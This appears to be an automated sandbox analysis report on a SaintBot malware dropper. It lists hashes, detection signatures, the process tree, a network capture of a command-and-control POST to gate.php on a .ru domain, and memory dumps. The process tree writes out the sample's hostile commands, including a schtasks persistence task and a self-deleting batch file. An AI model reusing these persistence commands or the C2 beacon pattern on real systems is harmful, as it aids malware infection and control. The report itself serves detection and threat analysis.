Analysis

  • max time kernel
    145s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    28/02/2022, 03:13 UTC

General

  • Target

    b1af67bcfaa99c369960580f86e7c1a42fc473dd85a0a4d3b1c989a6bc138a42.exe

  • Size

    269KB

  • MD5

    e640bdb76d7b30cb9ca9250d5b6631e3

  • SHA1

    0540792efa9eb7ecdcfce3340dc0be1204c1e8c8

  • SHA256

    b1af67bcfaa99c369960580f86e7c1a42fc473dd85a0a4d3b1c989a6bc138a42

  • SHA512

    0d9bbc8f82a212cbb92595f2d5e7e4e1bab00061286f04441dce4c383827e3d55a60afee4e1d52b2af4ded201c5c54c046a4065ca055cfa1448b807a4a4a2034

Malware Config

Signatures

  • SaintBot

    Saint Bot is a malware dropper being used to deliver secondary payloads such as information stealers.

  • SaintBot Payload 3 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • suricata: ET MALWARE Saint Bot CnC Activity

    suricata: ET MALWARE Saint Bot CnC Activity

  • suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer

    suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer

  • Executes dropped EXE 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Maps connected drives based on registry 3 TTPs 6 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b1af67bcfaa99c369960580f86e7c1a42fc473dd85a0a4d3b1c989a6bc138a42.exe
    "C:\Users\Admin\AppData\Local\Temp\b1af67bcfaa99c369960580f86e7c1a42fc473dd85a0a4d3b1c989a6bc138a42.exe"
    1⤵
    • Checks computer location settings
    • Drops startup file
    • Maps connected drives based on registry
    • Suspicious use of WriteProcessMemory
    PID:2456
    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\27718.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\27718.exe"
      2⤵
      • Executes dropped EXE
      • Drops startup file
      • Loads dropped DLL
      • Maps connected drives based on registry
      • Suspicious use of WriteProcessMemory
      PID:3688
      • C:\Windows\SysWOW64\EhStorAuthn.exe
        "C:\Windows\System32\EhStorAuthn.exe"
        3⤵
        • Loads dropped DLL
        • Adds Run key to start application
        • Maps connected drives based on registry
        • Drops file in System32 directory
        • Checks processor information in registry
        • Suspicious use of WriteProcessMemory
        PID:4128
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 5 /tn "Maintenance" /tr "C:\Users\%USERNAME%\AppData\Local\z_%USERNAME%\%USERNAME%.vbs" /F
          4⤵
          • Creates scheduled task(s)
          PID:3340
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3688 -s 620
        3⤵
        • Program crash
        • Checks processor information in registry
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:2192
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\del.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3560
      • C:\Windows\SysWOW64\PING.EXE
        ping localhost -n 3
        3⤵
        • Runs ping.exe
        PID:3512
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c del "C:\Users\Admin\AppData\Roaming\del.bat"
        3⤵
          PID:5100
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 1144
        2⤵
        • Program crash
        • Checks processor information in registry
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4164
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2456 -ip 2456
      1⤵
      • Suspicious use of NtCreateProcessExOtherParentProcess
      • Suspicious use of WriteProcessMemory
      PID:3464
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3688 -ip 3688
      1⤵
      • Suspicious use of NtCreateProcessExOtherParentProcess
      • Suspicious use of WriteProcessMemory
      PID:2560

    Network

    • flag-us
      DNS
      update-0019992.ru
      EhStorAuthn.exe
      Remote address:
      8.8.8.8:53
      Request
      update-0019992.ru
      IN A
      Response
      update-0019992.ru
      IN A
      194.67.71.18
    • flag-ru
      POST
      http://update-0019992.ru/testcp1/gate.php
      EhStorAuthn.exe
      Remote address:
      194.67.71.18:80
      Request
      POST /testcp1/gate.php HTTP/1.1
      Cache-Control: no-cache
      Connection: Keep-Alive
      Pragma: no-cache
      Content-Type: application/x-www-form-urlencoded
      Accept: text/plain
      User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 YaBrowser/15.10.2454.3865 Safari/537.36
      Content-Length: 201
      Host: update-0019992.ru
      Response
      HTTP/1.1 404 Not Found
      Server: nginx
      Date: Mon, 28 Feb 2022 03:14:48 GMT
      Content-Type: text/html
      Transfer-Encoding: chunked
      Connection: keep-alive
    • flag-us
      DNS
      15.89.54.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      15.89.54.20.in-addr.arpa
      IN PTR
      Response
    • 178.79.208.1:80
      322 B
      7
    • 178.79.208.1:80
      322 B
      7
    • 194.67.71.18:80
      http://update-0019992.ru/testcp1/gate.php
      http
      EhStorAuthn.exe
      1.0kB
      10.8kB
      10
      13

      HTTP Request

      POST http://update-0019992.ru/testcp1/gate.php

      HTTP Response

      404
    • 8.8.8.8:53
      update-0019992.ru
      dns
      EhStorAuthn.exe
      63 B
      79 B
      1
      1

      DNS Request

      update-0019992.ru

      DNS Response

      194.67.71.18

    • 8.8.8.8:53
      15.89.54.20.in-addr.arpa
      dns
      70 B
      156 B
      1
      1

      DNS Request

      15.89.54.20.in-addr.arpa

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2456-130-0x00000000019B7000-0x00000000019BD000-memory.dmp

      Filesize

      24KB

    • memory/2456-133-0x0000000000400000-0x000000000040C000-memory.dmp

      Filesize

      48KB

    • memory/2456-132-0x0000000000030000-0x0000000000039000-memory.dmp

      Filesize

      36KB

    • memory/2456-131-0x00000000019B7000-0x00000000019BD000-memory.dmp

      Filesize

      24KB

    • memory/3688-137-0x00000000019D6000-0x00000000019DC000-memory.dmp

      Filesize

      24KB

    • memory/3688-138-0x00000000019D6000-0x00000000019DC000-memory.dmp

      Filesize

      24KB

    • memory/4128-141-0x0000000000430000-0x000000000043C000-memory.dmp

      Filesize

      48KB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.